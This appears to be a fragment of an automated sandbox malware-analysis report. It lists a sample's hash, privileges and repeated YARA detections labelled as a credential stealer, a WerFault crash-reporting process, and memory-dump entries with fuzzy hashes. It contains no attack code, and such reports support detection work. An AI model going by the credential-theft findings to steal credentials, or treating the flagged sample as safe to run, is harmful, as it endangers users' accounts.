                                                                                                                                                                                                                                                                        Imagebase:0x6f0000
                                                                                                                                                                                                                                                                        File size:2'934'784 bytes
                                                                                                                                                                                                                                                                        MD5 hash:39A156657BE03CC94D69874B25836B8C
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2232123533.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2231739674.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:01:26:52
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924
                                                                                                                                                                                                                                                                        Imagebase:0xd0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Reset < >
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.2231739674.0000000001128000.00000004.00000020.00020000.00000000.sdmp, Offset: 01128000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_1128000_TmmiCE5Ulm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 7
                                                                                                                                                                                                                                                                          • API String ID: 0-1790921346
                                                                                                                                                                                                                                                                          • Opcode ID: 95d08eacc1ca456e1a40866b820ab41bf89172a5daafb04f11610a251a89bc53
                                                                                                                                                                                                                                                                          • Instruction ID: f990719c224896e3d8923f55f9bb94d293a9e34da59bcd63fa1d40de56d64aa4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95d08eacc1ca456e1a40866b820ab41bf89172a5daafb04f11610a251a89bc53
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A012AD5A80D6C11EE317873468A62E4BFB09E0F23D77E06CEC8D18E4B7E256451BC792
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.2334229101.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, Offset: 011A6000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_11a6000_TmmiCE5Ulm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6a11d567ed3c686ca955550fa17149172ea5afb458d062eacb59cd51adc63c12
                                                                                                                                                                                                                                                                          • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a11d567ed3c686ca955550fa17149172ea5afb458d062eacb59cd51adc63c12
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92